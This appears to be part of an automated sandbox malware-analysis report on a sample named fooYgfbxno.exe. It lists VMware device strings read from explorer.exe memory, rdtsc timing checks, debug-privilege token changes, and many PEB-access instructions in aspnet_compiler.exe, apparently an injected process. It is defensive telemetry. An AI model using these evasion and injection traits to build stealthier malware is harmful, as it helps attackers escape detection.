          Source: explorer.exe, 00000003.00000000.311602484.00000000080ED000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: War&Prod_VMware_SATA
          Source: explorer.exe, 00000003.00000000.271804441.000000000069D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000000.296334377.0000000008223000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000003.00000000.296334377.0000000008223000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}t]
          Source: explorer.exe, 00000003.00000000.291164109.00000000062C4000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000000.335060863.0000000004287000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}0
          Source: explorer.exe, 00000003.00000000.271804441.000000000069D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 00100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}oft.Mic
          Source: explorer.exe, 00000003.00000000.296334377.0000000008223000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}}^
          Source: explorer.exe, 00000003.00000000.311813363.000000000820E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000003.00000000.311602484.00000000080ED000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: explorer.exe, 00000003.00000000.296334377.0000000008223000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00l
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_004088C0 rdtsc
          Source: C:\Users\user\Desktop\fooYgfbxno.exeProcess token adjusted: Debug
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\svchost.exeProcess token adjusted: Debug
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0153B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0153B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0151B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0151B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0151C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_01519100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_01519100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_01519100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0154513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0154513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_01534120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_01534120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_01534120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_01534120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_01534120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0151B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0151B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0151B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015A41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_01542990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0154A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0153C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015951BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015951BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015951BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015951BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015399BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015399BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015399BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015399BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015399BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015399BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015399BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015399BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015399BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015399BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015399BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015399BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015461A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015461A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015D49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015D49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015D49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015D49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015969A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_01530050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_01530050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015E1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015D2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015E4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015E4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_01597016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_01597016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_01597016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0153A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0153A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0153A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0153A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0152B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0152B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0152B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0152B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0154002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0154002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0154002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0154002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0154002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015AB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015AB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015AB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015AB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015AB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015AB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015140E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015140E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015140E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0153B8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0153B8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015158EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_01519080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_01593884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_01593884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0154F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0154F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0154F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015590AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015E8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0151F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0151DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_01543B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_01543B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0151DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015D131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0153A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0153A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0153A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0153A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0153A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0153A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0153A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0153A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0153A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0153A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0153A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0153A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0153A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0153A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0153A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0153A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0153A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0153A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0153A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0153A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0153A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015953CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015953CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0153DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015C23E3 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015C23E3 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015C23E3 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_01542397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0154B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0153EB9A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0153EB9A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015D138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015CD380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_01521B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_01521B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0154138B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0154138B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0154138B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_01544BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_01544BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_01544BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015E5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015DEA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015A4257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_01519240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_01519240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_01519240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_01519240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0155927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015CB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015CB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015E8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_01515210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_01515210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_01515210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_01515210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0151AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0151AA16 mov eax, dword ptr fs:[00000030h]
